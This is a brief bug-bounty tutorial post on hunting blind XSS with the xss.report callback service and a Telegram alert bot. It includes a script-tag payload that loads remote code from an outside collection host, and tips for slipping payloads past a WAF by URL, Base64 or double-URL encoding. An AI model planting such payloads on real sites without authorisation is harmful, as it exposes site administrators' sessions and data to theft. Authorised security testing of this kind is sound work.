Hunting for Blind XSS can be tricky because you should have a server that runs 24/7 and is ready to receive any payload fired on the admin’s screen.
So, after a lot of research and testing, I will provide the best option you can use without paying for subscriptions.
Steps
Create a new account at: https://xss.report/register
After that, you will need to activate the Telegram bot to receive an alert when your payload fires.
Copy your token from the dashboard: https://xss.report/dashboard#settings
Go to https://t.me/XssReport_bot and select “Start Bot”
Then enable the bot by providing your token
The last step is testing the full setup
Copy the first payload from your payloads list on the dashboard.
Create a new file and make sure to give it the .html extension
<!-- BXSS.html -->
<script src=https://xss.report/c/username></script>
Then open the file in the browser. At this point, you should receive an alert from the Telegram bot.
To view all of the details of the affected target, you should access the full report from the dashboard: https://xss.report/dashboard#settings
And because Blind XSS most of the time will fire at the internal dashboard of the admin, it will be classified as P1 or P2.
Additional tips
Sometimes, the WAF will block your Blind XSS payloads, and you can bypass that by submitting the same payload after encoding it with URL or Base64.
If the WAF stell blocks your request, you can try double URL-encoding.
Follow for more: https://x.com/__the7th